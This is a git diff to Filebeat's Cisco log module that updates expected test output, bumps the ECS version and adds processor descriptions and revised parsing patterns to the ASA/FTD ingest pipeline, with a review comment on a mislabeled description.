@@ -3717,6 +3735,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-10-10T14:34:56.000Z", "event.timezone": "-02:00", @@ -4430,6 +4449,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-10-10T14:29:31.000Z", "event.timezone": "-02:00", @@ -4489,6 +4509,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:34:56.000Z", "event.timezone": "-02:00", diff --git a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json index d416dcb068c..0e0512e1c3a 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json @@ -442,6 +442,7 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.222", + "192.0.2.43", "10.123.1.35" ], "service.type": "cisco", @@ -543,7 +544,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.1", - "10.123.3.42" + "10.123.3.42", + "10.123.3.130" ], "service.type": "cisco", "source.address": "192.0.2.1", @@ -796,7 +798,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.0.17", - "192.168.3.42" + "192.168.3.42", + "10.0.0.130" ], "service.type": "cisco", "source.address": "192.0.0.17", 
@@ -2226,6 +2229,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%FTD-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-11T10:01:31.000Z", "event.timezone": "-02:00", @@ -2283,6 +2287,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-11T10:00:30.000Z", "event.timezone": "-02:00", @@ -2340,6 +2345,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-11T10:00:30.000Z", "event.timezone": "-02:00", @@ -2663,6 +2669,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%FTD-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-10T10:01:54.000Z", "event.timezone": "-02:00", @@ -3321,6 +3328,7 @@ ], "related.ip": [ "10.1.1.45", + "192.88.99.1", "192.88.99.129" ], "server.domain": "bad.example.com", @@ -3379,7 +3387,9 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", - "192.0.2.223" + "10.2.1.1", + "192.0.2.223", + "192.0.2.225" ], "service.type": "cisco", "source.address": "10.1.1.1", @@ -3436,6 +3446,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", 
diff --git a/x-pack/filebeat/module/cisco/ios/config/input.yml b/x-pack/filebeat/module/cisco/ios/config/input.yml index 52431a66183..c82ad9e2b5d 100644 --- a/x-pack/filebeat/module/cisco/ios/config/input.yml +++ b/x-pack/filebeat/module/cisco/ios/config/input.yml @@ -23,7 +23,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: cisco_ios diff --git a/x-pack/filebeat/module/cisco/meraki/config/input.yml b/x-pack/filebeat/module/cisco/meraki/config/input.yml index fe55241042b..581a3588720 100644 --- a/x-pack/filebeat/module/cisco/meraki/config/input.yml +++ b/x-pack/filebeat/module/cisco/meraki/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/cisco/meraki/test/generated.log-expected.json b/x-pack/filebeat/module/cisco/meraki/test/generated.log-expected.json index 93b1c694ae6..bde70c5a004 100644 --- a/x-pack/filebeat/module/cisco/meraki/test/generated.log-expected.json +++ b/x-pack/filebeat/module/cisco/meraki/test/generated.log-expected.json @@ -354,8 +354,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.210.213.18", - "10.134.0.141" + "10.134.0.141", + "10.210.213.18" ], "rsa.internal.event_desc": "atquovosecurity_event iumto", "rsa.internal.messageid": "security_event", @@ -531,8 +531,8 @@ "appliance" ], "related.ip": [ - "10.53.150.119", - "10.85.10.165" + "10.85.10.165", + "10.53.150.119" ], "rsa.internal.messageid": "events", "rsa.misc.event_source": "appliance", @@ -569,8 +569,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.187.77.245", - "10.88.231.224" + "10.88.231.224", + "10.187.77.245" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", 
@@ -753,8 +753,8 @@ "appliance" ], "related.ip": [ - "10.153.0.77", - "10.163.154.210" + "10.163.154.210", + "10.153.0.77" ], "rsa.counters.dclass_r1": "utlabor", "rsa.internal.messageid": "events", @@ -855,8 +855,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.12.182.70", - "10.31.77.157" + "10.31.77.157", + "10.12.182.70" ], "rsa.internal.event_desc": "uiac security_event epte", "rsa.internal.messageid": "security_event", @@ -993,8 +993,8 @@ "appliance" ], "related.ip": [ - "10.66.89.5", - "10.247.30.212" + "10.247.30.212", + "10.66.89.5" ], "rsa.internal.messageid": "flows", "rsa.misc.action": [ @@ -1058,8 +1058,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.173.136.186", - "10.221.102.245" + "10.221.102.245", + "10.173.136.186" ], "rsa.internal.event_desc": "idestlab", "rsa.internal.messageid": "security_event", @@ -1097,8 +1097,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.54.37.86", - "10.58.64.108" + "10.58.64.108", + "10.54.37.86" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -1136,8 +1136,8 @@ "appliance" ], "related.ip": [ - "10.147.76.202", - "10.163.93.20" + "10.163.93.20", + "10.147.76.202" ], "rsa.internal.messageid": "flows", "rsa.misc.action": [ @@ -1178,8 +1178,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.0.200.27", - "10.183.44.198" + "10.183.44.198", + "10.0.200.27" ], "rsa.internal.event_desc": "uradi security_event tot", "rsa.internal.messageid": "security_event", @@ -1216,8 +1216,8 @@ "appliance" ], "related.ip": [ - "10.28.144.180", - "10.148.124.84" + "10.148.124.84", + "10.28.144.180" ], "rsa.internal.messageid": "events", "rsa.misc.event_source": "appliance", 
@@ -1391,8 +1391,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.180.195.43", - "10.247.139.239" + "10.247.139.239", + "10.180.195.43" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -1781,8 +1781,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.196.96.162", - "10.81.234.34" + "10.81.234.34", + "10.196.96.162" ], "rsa.internal.event_desc": "Utenima security_event iqua", "rsa.internal.messageid": "security_event", @@ -1844,8 +1844,8 @@ "remips188.api.invalid" ], "related.ip": [ - "10.40.101.224", - "10.78.199.43" + "10.78.199.43", + "10.40.101.224" ], "rsa.internal.messageid": "events", "rsa.misc.event_source": "appliance", @@ -1919,8 +1919,8 @@ "appliance" ], "related.ip": [ - "10.39.172.93", - "10.83.131.245" + "10.83.131.245", + "10.39.172.93" ], "rsa.internal.messageid": "flows", "rsa.misc.action": [ @@ -1996,8 +1996,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.148.211.222", - "10.122.204.151" + "10.122.204.151", + "10.148.211.222" ], "rsa.internal.event_desc": "umexercisecurity_event duntut", "rsa.internal.messageid": "security_event", @@ -2143,8 +2143,8 @@ "uames4985.mail.localdomain" ], "related.ip": [ - "10.150.163.151", - "10.144.57.239" + "10.144.57.239", + "10.150.163.151" ], "rsa.internal.messageid": "events", "rsa.misc.event_source": "appliance", @@ -2185,8 +2185,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.52.202.158", - "10.54.44.231" + "10.54.44.231", + "10.52.202.158" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -2360,8 +2360,8 @@ "appliance" ], "related.ip": [ - "10.158.61.228", - "10.132.176.96" + "10.132.176.96", + "10.158.61.228" ], "rsa.counters.dclass_r1": "eserun", "rsa.internal.messageid": "events", 
@@ -2402,8 +2402,8 @@ "lors2232.api.example" ], "related.ip": [ - "10.46.217.155", - "10.105.136.146" + "10.105.136.146", + "10.46.217.155" ], "rsa.internal.messageid": "events", "rsa.misc.event_source": "appliance", @@ -2446,8 +2446,8 @@ "appliance" ], "related.ip": [ - "10.123.62.215", - "10.245.199.23" + "10.245.199.23", + "10.123.62.215" ], "rsa.db.index": "iusmodt", "rsa.internal.messageid": "flows", @@ -2558,8 +2558,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.34.62.190", - "10.246.152.72" + "10.246.152.72", + "10.34.62.190" ], "rsa.internal.event_desc": "Nem", "rsa.internal.messageid": "security_event", @@ -2671,8 +2671,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.121.9.5", - "10.244.32.189" + "10.244.32.189", + "10.121.9.5" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -2797,8 +2797,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.199.19.205", - "10.103.91.159" + "10.103.91.159", + "10.199.19.205" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -2839,8 +2839,8 @@ "appliance" ], "related.ip": [ - "10.17.111.91", - "10.65.0.157" + "10.65.0.157", + "10.17.111.91" ], "rsa.db.index": "nostrum", "rsa.internal.messageid": "flows", @@ -2939,8 +2939,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.177.64.152", - "10.140.242.86" + "10.140.242.86", + "10.177.64.152" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -3236,8 +3236,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.147.165.30", - "10.195.90.73" + "10.195.90.73", + "10.147.165.30" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", 
@@ -3426,8 +3426,8 @@ "appliance" ], "related.ip": [ - "10.75.122.111", - "10.85.59.172" + "10.85.59.172", + "10.75.122.111" ], "rsa.counters.dclass_r1": "sequat", "rsa.internal.messageid": "events", diff --git a/x-pack/filebeat/module/cisco/nexus/config/input.yml b/x-pack/filebeat/module/cisco/nexus/config/input.yml index b17aa083854..8bd0a36a42b 100644 --- a/x-pack/filebeat/module/cisco/nexus/config/input.yml +++ b/x-pack/filebeat/module/cisco/nexus/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml index b76b7a69a20..7cd61253320 100644 --- a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml +++ b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml 
@@ -183,97 +183,120 @@ processors: - dissect: if: "ctx._temp_.cisco.message_id == '106001'" field: "message" + description: "106001" pattern: "%{network.direction} %{network.transport} connection %{event.outcome} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} flags %{} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '106002'" field: "message" + description: "106002" pattern: "%{network.transport} Connection %{event.outcome} by %{network.direction} list %{_temp_.cisco.list_id} src %{source.address} dest %{destination.address}" - dissect: if: "ctx._temp_.cisco.message_id == '106006'" field: "message" + description: "106006" pattern: "%{event.outcome} %{network.direction} %{network.transport} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '106007'" field: "message" + description: "106007" pattern: "%{event.outcome} %{network.direction} %{network.transport} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} due to %{network.protocol} %{}" - grok: if: "ctx._temp_.cisco.message_id == '106010'" field: "message" + description: "106010" patterns: - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.direction} %{NOTSPACE:network.transport} src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address}/%{POSINT:source.port} (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{POSINT:destination.port}(%{GREEDYDATA})?" 
- dissect: if: "ctx._temp_.cisco.message_id == '106013'" field: "message" + description: "106013" pattern: "Dropping echo request from %{source.address} to PAT address %{destination.address}" - set: if: "ctx._temp_.cisco.message_id == '106013'" field: "network.transport" + description: "106013" value: icmp - set: if: "ctx._temp_.cisco.message_id == '106013'" field: "network.direction" + description: "106013" value: inbound - grok: if: "ctx._temp_.cisco.message_id == '106014'" field: "message" + description: "106014" patterns: - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.direction} %{NOTSPACE:network.transport} src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address} (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}(%{GREEDYDATA})?" - grok: if: "ctx._temp_.cisco.message_id == '106015'" field: "message" + description: "106015" patterns: - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.transport} %{NOTSPACE} from %{IP:source.address}/%{POSINT:source.port} to %{IP:destination.address}/%{POSINT:destination.port} flags %{DATA} on interface %{NOTSPACE:_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '106016'" field: "message" pattern: "%{event.outcome} IP spoof from (%{source.address}) to %{destination.address} on interface %{_temp_.cisco.source_interface}" + description: "106016" - dissect: if: "ctx._temp_.cisco.message_id == '106017'" field: "message" pattern: "%{event.outcome} IP due to Land Attack from %{source.address} to %{destination.address}" + description: "106017" - dissect: if: "ctx._temp_.cisco.message_id == '106018'" field: "message" pattern: "%{network.transport} packet type %{_temp_.cisco.icmp_type} %{event.outcome} by %{network.direction} list %{_temp_.cisco.list_id} src %{source.address} dest %{destination.address}" + description: "106018" - dissect: if: "ctx._temp_.cisco.message_id == '106020'" field: "message" pattern: "%{event.outcome} IP teardrop fragment (size 
= %{}, offset = %{}) from %{source.address} to %{destination.address}" + description: "106020" - dissect: if: "ctx._temp_.cisco.message_id == '106021'" field: "message" pattern: "%{event.outcome} %{network.transport} reverse path check from %{source.address} to %{destination.address} on interface %{_temp_.cisco.source_interface}" + description: "106021" - dissect: if: "ctx._temp_.cisco.message_id == '106022'" field: "message" pattern: "%{event.outcome} %{network.transport} connection spoof from %{source.address} to %{destination.address} on interface %{_temp_.cisco.source_interface}" + description: "106022" - grok: if: "ctx._temp_.cisco.message_id == '106023'" field: "message" + description: "106023" patterns: - ^%{NOTSPACE:event.outcome} %{NOTSPACE:network.transport} src %{NOTSPACE:_temp_.cisco.source_interface}:%{IPORHOST:source.address}(/%{POSINT:source.port})?\s*(%{GREEDYDATA:_temp_.cisco.source_username} )?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{IPORHOST:destination.address}(/%{POSINT:destination.port})?%{DATA}by access.group "%{NOTSPACE:_temp_.cisco.list_id}" - dissect: if: "ctx._temp_.cisco.message_id == '106027'" field: "message" + description: "106027" pattern: '%{} %{event.outcome} src %{source.address} dst %{destination.address} by access-group "%{_temp_.cisco.list_id}"' - dissect: if: "ctx._temp_.cisco.message_id == '106100'" field: "message" + description: "106100" pattern: "access-list %{_temp_.cisco.list_id} %{event.outcome} %{network.transport} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" - dissect: if: "ctx._temp_.cisco.message_id == '106102' || ctx._temp_.cisco.message_id == '106103'" field: "message" + description: "106103" pattern: "access-list %{_temp_.cisco.list_id} %{event.outcome} %{network.transport} for user %{user.name} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> 
%{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" - dissect: if: "ctx._temp_.cisco.message_id == '111004'" field: "message" + description: "111004" pattern: "%{source.address} end configuration: %{_temp_.cisco.cli_outcome}" - set: field: event.outcome + description: "111004" value: "success" if: "ctx._temp_.cisco.message_id == '111004' && ctx?._temp_?.cisco?.cli_outcome == 'OK'" - set: field: event.outcome + description: "111004" value: "failure" if: "ctx._temp_.cisco.message_id == '111004' && ctx?._temp_?.cisco?.cli_outcome == 'FAILED'" - remove: 
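Review bot: The description added to the dissect guarded by `ctx._temp_.cisco.message_id == '106102' || ctx._temp_.cisco.message_id == '106103'` names only `106103`, so a search of the pipeline for 106102 will not land on the processor that parses it. I would write `description: "106102, 106103"`, matching the comma-separated form this commit uses for other multi-ID conditions such as `"302013, 302015"`. The descriptions for 106016 through 106022 are also placed after `pattern`, while the other processors in this hunk put them directly after `field`; moving them keeps the block uniform. These labels are presumably what an analyst uses to trace a mis-parsed deny event back to its processor, so they should list every message ID the condition accepts.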
@@ -281,296 +304,374 @@ processors: ignore_missing: true - append: field: event.type + description: "111004" value: "change" if: "ctx._temp_.cisco.message_id == '111004'" - grok: if: "ctx._temp_.cisco.message_id == '111009'" + description: "111009" field: "message" patterns: - "^%{NOTSPACE} '%{NOTSPACE:host.user.name}' executed %{NOTSPACE} %{GREEDYDATA:_temp_.cisco.command_line_arguments}" - grok: if: "ctx._temp_.cisco.message_id == '111010'" field: "message" + description: "111010" patterns: - "User '%{NOTSPACE:host.user.name}', running %{QUOTEDSTRING} from IP %{IP:source.address}, executed %{QUOTEDSTRING:_temp_.cisco.command_line_arguments}" - dissect: if: "ctx._temp_.cisco.message_id == '113019'" field: "message" + description: "113019" pattern: "Group = %{}, Username = %{source.user.name}, IP = %{destination.address}, Session disconnected. Session Type: %{}, Duration: %{_temp_.duration_hms}, Bytes xmt: %{source.bytes}, Bytes rcv: %{destination.bytes}, Reason: %{message}" - grok: if: '["302013", "302015"].contains(ctx._temp_.cisco.message_id)' field: "message" + description: "302013, 302015" patterns: - "Built %{NOTSPACE:network.direction} %{NOTSPACE:network.transport} connection %{NUMBER:_temp_.cisco.connection_id} for %{NOTSPACE:_temp_.cisco.source_interface}:%{IP:source.address}/%{NUMBER:source.port} \\(%{IP:_temp_.natsrcip}/%{NUMBER:_temp_.cisco.mapped_source_port}\\)(\\(%{NOTSPACE:_temp_.cisco.source_username}\\))? 
to %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{NUMBER:destination.port} \\(%{NOTSPACE:_temp_.natdstip}/%{NUMBER:_temp_.cisco.mapped_destination_port}\\)( \\(%{NOTSPACE:destination.user.name}\\))?%{GREEDYDATA}" - dissect: if: "ctx._temp_.cisco.message_id == '303002'" field: "message" + description: "303002" pattern: "%{network.protocol} connection from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}, user %{client.user.name} %{} file %{file.path}" - dissect: if: "ctx._temp_.cisco.message_id == '302012'" field: "message" + description: "302012" pattern: "Teardown %{} %{network.transport} translation from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} duration %{_temp_.duration_hms}" - grok: if: "ctx._temp_.cisco.message_id == '302020'" field: "message" + description: "302020" patterns: - - "Built %{NOTSPACE:network.direction} %{NOTSPACE:network.protocol} connection for faddr %{IP:destination.address}/%{NUMBER} (%{DATA})?gaddr %{IP:_temp_.natsrcip}/%{NUMBER} laddr %{IP:source.address}/%{NUMBER}(%{GREEDYDATA})?" + - "Built %{NOTSPACE:network.direction} %{NOTSPACE:network.protocol} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\\s*(?:\\(%{NOTSPACE:_temp_.cisco.destination_username}\\) )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\\s*(?:\\(%{NOTSPACE:_temp_.cisco.source_username}\\) )?(type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})?" 
+ pattern_definitions: + NOTCOLON: "[^:]*" + ECSSOURCEIPORHOST: "(?:%{IP:source.address}|%{HOSTNAME:source.domain})" + ECSDESTIPORHOST: "(?:%{IP:destination.address}|%{HOSTNAME:destination.domain})" + MAPPEDSRC: "(?:%{DATA:_temp_.natsrcip}|%{HOSTNAME})" - dissect: if: "ctx._temp_.cisco.message_id == '302022'" field: "message" - pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + description: "302022" + pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} %{} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} %{}" - dissect: if: "ctx._temp_.cisco.message_id == '302023'" field: "message" + description: "302023" pattern: "Teardown stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} duration %{_temp_.duration_hms} forwarded bytes %{network.bytes} %{event.reason}" - grok: if: "ctx._temp_.cisco.message_id == '304001'" field: "message" + description: "304001" patterns: - "%{IP:source.address} %{DATA} (%{NOTSPACE}@)?%{IP:destination.address}:%{GREEDYDATA:url.original}" - set: if: "ctx._temp_.cisco.message_id == '304001'" field: "event.outcome" + description: "304001" value: allow - dissect: if: "ctx._temp_.cisco.message_id == '304002'" field: "message" + description: "304002" pattern: "Access %{event.outcome} URL %{url.original} SRC %{source.address} %{}EST %{destination.address} on interface %{_temp_.cisco.source_interface}" - - dissect: + - grok: if: "ctx._temp_.cisco.message_id == '305011'" field: "message" - pattern: "Built %{} %{network.transport} translation from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to 
%{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + description: "305011" + patterns: + - Built %{NOTSPACE} %{NOTSPACE:network.transport} translation from %{NOTSPACE:_temp_.cisco.source_interface}:%{IP:source.address}/%{NUMBER:source.port}(\(%{NOTSPACE:source.user.name}\))? to %{NOTSPACE:_temp_.cisco.destination_interface}:%{IP:destination.address}/%{NUMBER:destination.port} - dissect: if: "ctx._temp_.cisco.message_id == '313001'" field: "message" + description: "313001" pattern: "%{event.outcome} %{network.transport} type=%{_temp_.cisco.icmp_type}, code=%{_temp_.cisco.icmp_code} from %{source.address} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '313004'" field: "message" + description: "313004" pattern: "%{event.outcome} %{network.transport} type=%{_temp_.cisco.icmp_type}, from%{}addr %{source.address} on interface %{_temp_.cisco.source_interface} to %{destination.address}: no matching session" - dissect: if: "ctx._temp_.cisco.message_id == '313005'" field: "message" + description: "313005" pattern: "No matching connection for %{network.transport} error message: %{} on %{_temp_.cisco.source_interface} interface.%{}riginal IP payload: %{}" - dissect: if: "ctx._temp_.cisco.message_id == '313008'" field: "message" + description: "313008" pattern: "%{event.outcome} %{network.transport} type=%{_temp_.cisco.icmp_type}, code=%{_temp_.cisco.icmp_code} from %{source.address} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '313009'" field: "message" + description: "313009" pattern: "%{event.outcome} invalid %{network.transport} code %{_temp_.cisco.icmp_code}, for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}" - dissect: if: 
"ctx._temp_.cisco.message_id == '322001'" field: "message" + description: "322001" pattern: "%{event.outcome} MAC address %{source.mac}, possible spoof attempt on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '338001'" field: "message" + description: "338001" pattern: "Dynamic filter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338001'" field: "server.domain" + description: "338001" value: "{{source.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338002'" field: "message" + description: "338002" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}" - set: if: "ctx._temp_.cisco.message_id == '338002'" field: "server.domain" + description: "338002" value: "{{destination.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338003'" field: "message" + description: "338003" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to 
%{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338004'" field: "message" + description: "338004" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338005'" field: "message" + description: "338005" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338005'" field: "server.domain" + description: "338005" value: "{{source.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338006'" field: "message" + description: "338006" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to 
